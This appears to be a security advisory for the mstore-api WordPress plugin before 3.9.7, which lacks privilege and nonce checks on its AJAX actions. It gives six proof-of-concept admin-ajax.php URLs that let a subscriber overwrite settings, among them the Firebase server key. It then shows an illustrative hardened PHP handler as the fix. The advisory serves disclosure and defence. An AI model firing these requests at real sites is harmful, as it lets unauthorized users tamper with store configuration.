The plugin does not secure most of its AJAX actions by implementing privilege checks, nonce checks, or a combination of both.
Make sure the site also has WooCommerce installed and activated, then, while logged in as a subscriber, visit the following URLs:

- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_limit_product&limit=99
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_firebase_server_key&serverKey=hacked
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_title&title=1337
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_message&message=hacked+message
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_title&title=1338
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_message&message=hacked+message

Then, while logged in as an administrator, visit /wp-admin/admin.php?page=mstore-plugin and notice how the attacks have changed all the values.
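The fix for this class of bug is to gate every settings-changing `wp_ajax_*` handler on both a capability check and a nonce check, and to never register a `wp_ajax_nopriv_*` variant for it. The following is an added, illustrative hardened handler for one of the actions listed above; it is not the plugin's actual code, and the option name `mstore_limit_product`, the nonce action string `mstore_settings` and the function name are assumptions.

```php
<?php
// Illustrative hardened handler for the mstore_update_limit_product AJAX action.
// Added example, not the plugin's own code; option and nonce names are assumptions.

add_action( 'wp_ajax_mstore_update_limit_product', 'mstore_example_update_limit_product' );
// Deliberately no wp_ajax_nopriv_ hook: unauthenticated users must never reach this.

function mstore_example_update_limit_product() {
    // 1. Privilege check. Without it, any logged-in subscriber who can reach
    //    admin-ajax.php can change the setting, which is the bug described above.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges.' ), 403 );
    }

    // 2. Nonce check (CSRF protection). The settings page must emit a nonce
    //    created with wp_create_nonce( 'mstore_settings' ); check_ajax_referer()
    //    terminates the request with HTTP 403 when the nonce is missing or stale.
    check_ajax_referer( 'mstore_settings', '_ajax_nonce' );

    // 3. Accept state changes only via POST, never from a bare GET link.
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        wp_send_json_error( array( 'message' => 'POST required.' ), 405 );
    }

    // 4. Validate the input: the product limit must be a positive integer.
    $limit = isset( $_POST['limit'] ) ? absint( wp_unslash( $_POST['limit'] ) ) : 0;
    if ( $limit < 1 ) {
        wp_send_json_error( array( 'message' => 'Invalid limit.' ), 400 );
    }

    update_option( 'mstore_limit_product', $limit );
    wp_send_json_success( array( 'limit' => $limit ) );
}
```

The same three gates (capability, nonce, input validation) apply to each of the other `mstore_update_*` actions listed above; the admin page passes the nonce to its JavaScript, for example through `wp_localize_script()`.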
| CPE | Name | Operator | Version |
|---|---|---|---|
| | mstore-api | lt | 3.9.7 |